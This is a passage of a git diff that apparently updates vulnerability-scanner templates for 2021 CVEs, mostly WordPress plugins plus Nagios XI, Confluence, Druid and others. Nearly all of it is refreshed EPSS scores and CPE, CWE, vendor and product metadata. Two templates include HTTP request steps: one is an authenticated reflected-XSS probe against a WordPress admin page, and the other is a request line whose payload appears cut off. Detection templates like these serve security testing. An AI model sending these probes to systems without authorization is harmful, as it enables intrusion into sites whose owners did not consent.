cwe-id: CWE-601 - epss-score: 0.00141 + epss-score: 0.00106 cpe: cpe:2.3:a:bologer:anycomment:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.42451 metadata: max-request: 2 verified: true diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml index bca1b92a42..6a3f5054ba 100644 --- a/http/cves/2021/CVE-2021-24862.yaml +++ b/http/cves/2021/CVE-2021-24862.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24862 cwe-id: CWE-89 - epss-score: 0.53036 + epss-score: 0.61777 cpe: cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.97374 metadata: max-request: 3 verified: true diff --git a/http/cves/2021/CVE-2021-24875.yaml b/http/cves/2021/CVE-2021-24875.yaml index dd5641a7c0..45d241e6e2 100644 --- a/http/cves/2021/CVE-2021-24875.yaml +++ b/http/cves/2021/CVE-2021-24875.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00143 cpe: cpe:2.3:a:implecode:ecommerce_product_catalog:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.49453 metadata: max-request: 2 verified: true diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index 9ea9e284be..54c95a8e1d 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00116 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.44609 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24910.yaml b/http/cves/2021/CVE-2021-24910.yaml index 4d93c86189..5e68dfe34d 100644 --- a/http/cves/2021/CVE-2021-24910.yaml +++ b/http/cves/2021/CVE-2021-24910.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24910 cwe-id: CWE-79 - epss-score: 0.00083 + epss-score: 0.00097 cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.39802 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-24917.yaml b/http/cves/2021/CVE-2021-24917.yaml index eb0df77a20..2b206d81ce 100644 --- a/http/cves/2021/CVE-2021-24917.yaml +++ b/http/cves/2021/CVE-2021-24917.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24917 cwe-id: CWE-863 - epss-score: 0.03765 + epss-score: 0.04226 cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.91138 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-24926.yaml b/http/cves/2021/CVE-2021-24926.yaml index f91773965f..6cb926644e 100644 --- a/http/cves/2021/CVE-2021-24926.yaml +++ b/http/cves/2021/CVE-2021-24926.yaml @@ -13,8 +13,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24926 cwe-id: CWE-79 - epss-score: 0.00201 + epss-score: 0.00171 cpe: cpe:2.3:a:domaincheckplugin:domain_check:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.53541 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24931.yaml b/http/cves/2021/CVE-2021-24931.yaml index c0ed028cb6..c37df90d70 100644 --- a/http/cves/2021/CVE-2021-24931.yaml +++ b/http/cves/2021/CVE-2021-24931.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24931 cwe-id: CWE-89 - epss-score: 0.04182 + epss-score: 0.12212 cpe: cpe:2.3:a:ays-pro:secure_copy_content_protection_and_content_locking:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.94654 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-24940.yaml b/http/cves/2021/CVE-2021-24940.yaml index e67d952c8f..3f0e5dd14b 100644 --- a/http/cves/2021/CVE-2021-24940.yaml +++ b/http/cves/2021/CVE-2021-24940.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24940 cwe-id: CWE-79 - epss-score: 0.00119 + epss-score: 0.00141 cpe: cpe:2.3:a:woocommerce:persian-woocommerce:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.49173 metadata: max-request: 2 verified: true diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml index 0f4b96d116..9665593dc4 100644 --- a/http/cves/2021/CVE-2021-24946.yaml +++ b/http/cves/2021/CVE-2021-24946.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24946 cwe-id: CWE-89 - epss-score: 0.038 + epss-score: 0.05911 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.92472 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-24947.yaml b/http/cves/2021/CVE-2021-24947.yaml index 1492831cdb..67f6133cb7 100644 --- a/http/cves/2021/CVE-2021-24947.yaml +++ b/http/cves/2021/CVE-2021-24947.yaml @@ -13,8 +13,9 @@ info: cvss-score: 6.5 cve-id: CVE-2021-24947 cwe-id: CWE-352,CWE-863 - epss-score: 0.00406 + epss-score: 0.00444 cpe: cpe:2.3:a:thinkupthemes:responsive_vector_maps:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.71723 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24956.yaml b/http/cves/2021/CVE-2021-24956.yaml index 9505e9b7cf..57e1831c7b 100644 --- a/http/cves/2021/CVE-2021-24956.yaml +++ b/http/cves/2021/CVE-2021-24956.yaml @@ -6,15 +6,24 @@ info: severity: medium description: | The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue. - remediation: Fixed in version 6.8.7 reference: - https://wpscan.com/vulnerability/5882ea89-f463-4f0b-a624-150bbaf967c2 - https://nvd.nist.gov/vuln/detail/CVE-2021-24956 + remediation: Fixed in version 6.8.7 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2021-24956 + cwe-id: CWE-79 + epss-score: 0.00106 + cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.42451 metadata: max-request: 2 verified: true + framework: wordpress + vendor: adenion + product: blog2social tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan http: @@ -25,12 +34,12 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/admin.php?page=blog2social&b2sShowByDate="> HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2021/CVE-2021-24970.yaml b/http/cves/2021/CVE-2021-24970.yaml index 4994c704f4..94097db836 100644 --- a/http/cves/2021/CVE-2021-24970.yaml +++ b/http/cves/2021/CVE-2021-24970.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24970 cwe-id: CWE-22 - epss-score: 0.02573 + epss-score: 0.02825 cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.89345 metadata: max-request: 2 verified: true diff --git a/http/cves/2021/CVE-2021-24987.yaml b/http/cves/2021/CVE-2021-24987.yaml index 84ddfa7e89..9daeddac3f 100644 --- a/http/cves/2021/CVE-2021-24987.yaml +++ b/http/cves/2021/CVE-2021-24987.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00097 cpe: cpe:2.3:a:heateor:super_socializer:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.39802 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24991.yaml b/http/cves/2021/CVE-2021-24991.yaml index 2c3e4fc753..468204ccc7 100644 --- a/http/cves/2021/CVE-2021-24991.yaml +++ b/http/cves/2021/CVE-2021-24991.yaml @@ -13,8 +13,9 @@ info: cvss-score: 4.8 cve-id: CVE-2021-24991 cwe-id: CWE-79 - epss-score: 0.0008 + epss-score: 0.00069 cpe: cpe:2.3:a:wpovernight:woocommerce_pdf_invoices\&_packing_slips:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.28575 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24997.yaml b/http/cves/2021/CVE-2021-24997.yaml index 07a91dd33f..1765441b2c 100644 --- a/http/cves/2021/CVE-2021-24997.yaml +++ b/http/cves/2021/CVE-2021-24997.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.5 cve-id: CVE-2021-24997 cwe-id: CWE-862 - epss-score: 0.00182 + epss-score: 0.00213 cpe: cpe:2.3:a:wp-guppy:wp_guppy:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.5851 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-25003.yaml b/http/cves/2021/CVE-2021-25003.yaml index 78affafe86..e2a2c8dc98 100644 --- a/http/cves/2021/CVE-2021-25003.yaml +++ b/http/cves/2021/CVE-2021-25003.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-25003 cwe-id: CWE-434,CWE-94 - epss-score: 0.69837 + epss-score: 0.5944 cpe: cpe:2.3:a:wptaskforce:wpcargo_track_\&_trace:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.97311 metadata: max-request: 3 verified: true diff --git a/http/cves/2021/CVE-2021-25008.yaml b/http/cves/2021/CVE-2021-25008.yaml index 45361cad91..d61ed36b6b 100644 --- a/http/cves/2021/CVE-2021-25008.yaml +++ b/http/cves/2021/CVE-2021-25008.yaml @@ -13,8 +13,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25008 cwe-id: CWE-79 - epss-score: 0.00141 + epss-score: 0.00106 cpe: cpe:2.3:a:codesnippets:code_snippets:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.42451 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-25028.yaml b/http/cves/2021/CVE-2021-25028.yaml index ccdd504e1c..8faeb91217 100644 --- a/http/cves/2021/CVE-2021-25028.yaml +++ b/http/cves/2021/CVE-2021-25028.yaml @@ -13,8 +13,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25028 cwe-id: CWE-601 - epss-score: 0.00141 + epss-score: 0.00106 cpe: cpe:2.3:a:tri:event_tickets:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.42451 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-25033.yaml b/http/cves/2021/CVE-2021-25033.yaml index b8f77a9ac4..fa7d40f5d9 100644 --- a/http/cves/2021/CVE-2021-25033.yaml +++ b/http/cves/2021/CVE-2021-25033.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25033 cwe-id: CWE-601 - epss-score: 0.00112 + epss-score: 0.00115 cpe: cpe:2.3:a:noptin:noptin:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.44376 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-25052.yaml b/http/cves/2021/CVE-2021-25052.yaml index 1f752e9bb3..5f60899236 100644 --- a/http/cves/2021/CVE-2021-25052.yaml +++ b/http/cves/2021/CVE-2021-25052.yaml @@ -14,8 +14,9 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25052 cwe-id: CWE-352 - epss-score: 0.01063 + epss-score: 0.01231 cpe: cpe:2.3:a:wow-company:button_generator:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.83713 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-25055.yaml b/http/cves/2021/CVE-2021-25055.yaml index 9ad3e2d608..35b433c37f 100644 --- a/http/cves/2021/CVE-2021-25055.yaml +++ b/http/cves/2021/CVE-2021-25055.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25055 cwe-id: CWE-79 - epss-score: 0.00112 + epss-score: 0.00133 cpe: cpe:2.3:a:feedwordpress_project:feedwordpress:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.47722 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-25063.yaml b/http/cves/2021/CVE-2021-25063.yaml index 56eec6aa42..81fff17679 100644 --- a/http/cves/2021/CVE-2021-25063.yaml +++ b/http/cves/2021/CVE-2021-25063.yaml @@ -13,8 +13,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25063 cwe-id: CWE-79 - epss-score: 0.00141 + epss-score: 0.00106 cpe: cpe:2.3:a:cf7skins:contact_form_7_skins:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.42451 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml index 2bc4a040e7..6dd3a81fb5 100644 --- a/http/cves/2021/CVE-2021-25065.yaml +++ b/http/cves/2021/CVE-2021-25065.yaml @@ -6,18 +6,25 @@ info: severity: medium description: | The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page. - remediation: Fixed in version 2.19.2 reference: - https://wpscan.com/vulnerability/ae1aab4e-b00a-458b-a176-85761655bdcc - https://wordpress.org/plugins/custom-facebook-feed/ + remediation: Fixed in version 2.19.2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 + cve-id: CVE-2021-25065 cwe-id: CWE-79 + epss-score: 0.00069 + cpe: cpe:2.3:a:smashballoon:smash_balloon_social_post_feed:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.28379 metadata: max-request: 2 verified: true publicwww-query: "/wp-content/plugins/custom-facebook-feed/" + framework: wordpress + vendor: smashballoon + product: smash_balloon_social_post_feed tags: cve,cve2021,wpscan,wordpress,wp-plugin,xss,wp,authenticated http: @@ -28,7 +35,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E&cff_final_response=true HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2021/CVE-2021-25067.yaml b/http/cves/2021/CVE-2021-25067.yaml index 8a0c8e845d..d04256d314 100644 --- a/http/cves/2021/CVE-2021-25067.yaml +++ b/http/cves/2021/CVE-2021-25067.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.4 cve-id: CVE-2021-25067 cwe-id: CWE-79 - epss-score: 0.00092 + epss-score: 0.00069 cpe: cpe:2.3:a:pluginops:landing_page:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.28379 metadata: max-request: 2 verified: true diff --git a/http/cves/2021/CVE-2021-25074.yaml b/http/cves/2021/CVE-2021-25074.yaml index 86504a0c42..b2afd31e43 100644 --- a/http/cves/2021/CVE-2021-25074.yaml +++ b/http/cves/2021/CVE-2021-25074.yaml @@ -13,8 +13,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25074 cwe-id: CWE-601 - epss-score: 0.00141 + epss-score: 0.00106 cpe: cpe:2.3:a:webp_converter_for_media_project:webp_converter_for_media:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.42451 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-25075.yaml b/http/cves/2021/CVE-2021-25075.yaml index 941965b41c..4cd5abe180 100644 --- a/http/cves/2021/CVE-2021-25075.yaml +++ b/http/cves/2021/CVE-2021-25075.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-862 epss-score: 0.00094 cpe: cpe:2.3:a:wpdevart:duplicate_page_or_post:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.39063 metadata: max-request: 3 framework: wordpress diff --git a/http/cves/2021/CVE-2021-25078.yaml b/http/cves/2021/CVE-2021-25078.yaml index 8e30c6be87..ce5846ea3e 100644 --- a/http/cves/2021/CVE-2021-25078.yaml +++ b/http/cves/2021/CVE-2021-25078.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25078 cwe-id: CWE-79 - epss-score: 0.00508 + epss-score: 0.00382 cpe: cpe:2.3:a:wpaffiliatemanager:affiliates_manager:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.696 metadata: max-request: 3 verified: true diff --git a/http/cves/2021/CVE-2021-25085.yaml b/http/cves/2021/CVE-2021-25085.yaml index 1a03bb69ed..35df057f5d 100644 --- a/http/cves/2021/CVE-2021-25085.yaml +++ b/http/cves/2021/CVE-2021-25085.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25085 cwe-id: CWE-79 - epss-score: 0.00133 + epss-score: 0.001 cpe: cpe:2.3:a:pluginus:woocommerce_products_filter:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.40521 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-25099.yaml b/http/cves/2021/CVE-2021-25099.yaml index 03d9918fea..0939c0e40b 100644 --- a/http/cves/2021/CVE-2021-25099.yaml +++ b/http/cves/2021/CVE-2021-25099.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25099 cwe-id: CWE-79 - epss-score: 0.00112 + epss-score: 0.00133 cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.47722 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-25104.yaml b/http/cves/2021/CVE-2021-25104.yaml index fe4a12b1b4..4adf1731db 100644 --- a/http/cves/2021/CVE-2021-25104.yaml +++ b/http/cves/2021/CVE-2021-25104.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25104 cwe-id: CWE-79 - epss-score: 0.001 + epss-score: 0.00119 cpe: cpe:2.3:a:oceanwp:ocean_extra:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.45304 metadata: max-request: 2 verified: true diff --git a/http/cves/2021/CVE-2021-25111.yaml b/http/cves/2021/CVE-2021-25111.yaml index e037542fa4..b889fa84ae 100644 --- a/http/cves/2021/CVE-2021-25111.yaml +++ b/http/cves/2021/CVE-2021-25111.yaml @@ -13,8 +13,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25111 cwe-id: CWE-601 - epss-score: 0.00119 + epss-score: 0.0012 cpe: cpe:2.3:a:english_wordpress_admin_project:english_wordpress_admin:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.45408 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-25112.yaml b/http/cves/2021/CVE-2021-25112.yaml index f90bf6e45b..0b072155a3 100644 --- a/http/cves/2021/CVE-2021-25112.yaml +++ b/http/cves/2021/CVE-2021-25112.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25112 cwe-id: CWE-79 - epss-score: 0.00112 + epss-score: 0.00133 cpe: cpe:2.3:a:i-plugins:whmcs_bridge:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.47722 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index 83dcf5b6bd..ef7f246b6f 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-25114 cwe-id: CWE-89 - epss-score: 0.0364 + epss-score: 0.04575 cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.91459 metadata: max-request: 2 google-query: inurl:"/wp-content/plugins/paid-memberships-pro" diff --git a/http/cves/2021/CVE-2021-25118.yaml b/http/cves/2021/CVE-2021-25118.yaml index 92b91407d1..36245b050c 100644 --- a/http/cves/2021/CVE-2021-25118.yaml +++ b/http/cves/2021/CVE-2021-25118.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.3 cve-id: CVE-2021-25118 cwe-id: CWE-200 - epss-score: 0.00174 + epss-score: 0.00206 cpe: cpe:2.3:a:yoast:yoast_seo:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.57883 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-25120.yaml b/http/cves/2021/CVE-2021-25120.yaml index 942af72eb3..3efbd810ac 100644 --- a/http/cves/2021/CVE-2021-25120.yaml +++ b/http/cves/2021/CVE-2021-25120.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25120 cwe-id: CWE-79 - epss-score: 0.00119 + epss-score: 0.0012 cpe: cpe:2.3:a:easysocialfeed:easy_social_feed:*:*:*:*:pro:wordpress:*:* + epss-percentile: 0.45408 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-25281.yaml b/http/cves/2021/CVE-2021-25281.yaml index 81c683dbc6..84a03c4664 100644 --- a/http/cves/2021/CVE-2021-25281.yaml +++ b/http/cves/2021/CVE-2021-25281.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-25281 cwe-id: CWE-287 - epss-score: 0.8118 + epss-score: 0.84879 cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* + epss-percentile: 0.9806 metadata: max-request: 1 vendor: saltstack diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml index c8899a14c9..593f6aafcf 100644 --- a/http/cves/2021/CVE-2021-25296.yaml +++ b/http/cves/2021/CVE-2021-25296.yaml @@ -17,8 +17,9 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25296 cwe-id: CWE-78 - epss-score: 0.89267 + epss-score: 0.89404 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* + epss-percentile: 0.98323 metadata: max-request: 4 shodan-query: title:"Nagios XI" diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml index 18f88c3566..3682c6171e 100644 --- a/http/cves/2021/CVE-2021-25297.yaml +++ b/http/cves/2021/CVE-2021-25297.yaml @@ -17,8 +17,9 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25297 cwe-id: CWE-78 - epss-score: 0.89267 + epss-score: 0.89404 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* + epss-percentile: 0.98323 metadata: max-request: 4 shodan-query: title:"Nagios XI" diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml index 2010d31b88..911c29db4c 100644 --- a/http/cves/2021/CVE-2021-25298.yaml +++ b/http/cves/2021/CVE-2021-25298.yaml @@ -17,8 +17,9 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25298 cwe-id: CWE-78 - epss-score: 0.97375 + epss-score: 0.97378 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* + epss-percentile: 0.99861 metadata: max-request: 4 shodan-query: title:"Nagios XI" diff --git a/http/cves/2021/CVE-2021-25299.yaml b/http/cves/2021/CVE-2021-25299.yaml index 8c4a800740..c019878ad2 100644 --- a/http/cves/2021/CVE-2021-25299.yaml +++ b/http/cves/2021/CVE-2021-25299.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.96825 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* + epss-percentile: 0.99548 metadata: max-request: 3 shodan-query: title:"Nagios XI" diff --git a/http/cves/2021/CVE-2021-25646.yaml b/http/cves/2021/CVE-2021-25646.yaml index af2bd1ae98..1fc1bb5c1b 100644 --- a/http/cves/2021/CVE-2021-25646.yaml +++ b/http/cves/2021/CVE-2021-25646.yaml @@ -17,8 +17,9 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25646 cwe-id: CWE-732 - epss-score: 0.97431 + epss-score: 0.97361 cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* + epss-percentile: 0.99843 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2021/CVE-2021-25864.yaml b/http/cves/2021/CVE-2021-25864.yaml index b03b5d5639..39c918d6e0 100644 --- a/http/cves/2021/CVE-2021-25864.yaml +++ b/http/cves/2021/CVE-2021-25864.yaml @@ -13,14 +13,15 @@ info: cvss-score: 7.5 cve-id: CVE-2021-25864 cwe-id: CWE-22 - epss-score: 0.55044 - cpe: cpe:2.3:a:node-red-contrib-huemagic_project:node-red-contrib-huemagic:3.0.0:*:*:*:*:node.js:*:* + epss-score: 0.53923 + cpe: cpe:2.3:a:dgtl:huemagic:3.0.0:*:*:*:*:node.js:*:* + epss-percentile: 0.97171 metadata: max-request: 1 shodan-query: title:"NODE-RED" framework: node.js - vendor: node-red-contrib-huemagic_project - product: node-red-contrib-huemagic + vendor: dgtl + product: huemagic tags: cve,cve2021,huemagic,lfi http: diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index dcc051e4f9..d14b877e43 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-25899 cwe-id: CWE-89 - epss-score: 0.45931 + epss-score: 0.54555 cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:* + epss-percentile: 0.97184 metadata: max-request: 1 shodan-query: html:"AURALL" diff --git a/http/cves/2021/CVE-2021-26084.yaml b/http/cves/2021/CVE-2021-26084.yaml index 8b42721099..4202bc9b4e 100644 --- a/http/cves/2021/CVE-2021-26084.yaml +++ b/http/cves/2021/CVE-2021-26084.yaml @@ -14,9 +14,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-26084 - cwe-id: CWE-74 - epss-score: 0.97474 + cwe-id: CWE-917 + epss-score: 0.97457 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* + epss-percentile: 0.99929 metadata: max-request: 13 shodan-query: http.component:"Atlassian Confluence" diff --git a/http/cves/2021/CVE-2021-26085.yaml b/http/cves/2021/CVE-2021-26085.yaml index a40f689863..2cbb826f2a 100644 --- a/http/cves/2021/CVE-2021-26085.yaml +++ b/http/cves/2021/CVE-2021-26085.yaml @@ -14,9 +14,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-26085 - cwe-id: CWE-862 - epss-score: 0.96617 + cwe-id: CWE-425 + epss-score: 0.9661 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* + epss-percentile: 0.99455 metadata: max-request: 1 shodan-query: http.component:"Atlassian Confluence" diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml index 2054a10806..44efe7e67b 100644 --- a/http/cves/2021/CVE-2021-26086.yaml +++ b/http/cves/2021/CVE-2021-26086.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.94427 cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* + epss-percentile: 0.98891 metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" diff --git a/http/cves/2021/CVE-2021-26247.yaml b/http/cves/2021/CVE-2021-26247.yaml index 4f1d604e91..87089363fd 100644 --- a/http/cves/2021/CVE-2021-26247.yaml +++ b/http/cves/2021/CVE-2021-26247.yaml @@ -13,8 +13,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-26247 cwe-id: CWE-79 - epss-score: 0.00277 + epss-score: 0.00252 cpe: cpe:2.3:a:cacti:cacti:0.8.7g:*:*:*:*:*:*:* + epss-percentile: 0.62358 metadata: max-request: 1 vendor: cacti diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml index 0bc74b537f..66e141702e 100644 --- a/http/cves/2021/CVE-2021-26295.yaml +++ b/http/cves/2021/CVE-2021-26295.yaml @@ -18,8 +18,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-26295 cwe-id: CWE-502 - epss-score: 0.97487 + epss-score: 0.97456 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* + epss-percentile: 0.99928 metadata: max-request: 1 shodan-query: "OFBiz.Visitor=" diff --git a/http/cves/2021/CVE-2021-26475.yaml b/http/cves/2021/CVE-2021-26475.yaml index a40918111e..949d989ac6 100644 --- a/http/cves/2021/CVE-2021-26475.yaml +++ b/http/cves/2021/CVE-2021-26475.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00156 cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:* + epss-percentile: 0.51402 metadata: max-request: 1 vendor: eprints diff --git a/http/cves/2021/CVE-2021-26598.yaml b/http/cves/2021/CVE-2021-26598.yaml index 92fe0008b0..10d602a4c4 100644 --- a/http/cves/2021/CVE-2021-26598.yaml +++ b/http/cves/2021/CVE-2021-26598.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.3 cve-id: CVE-2021-26598 cwe-id: CWE-287 - epss-score: 0.00364 + epss-score: 0.00425 cpe: 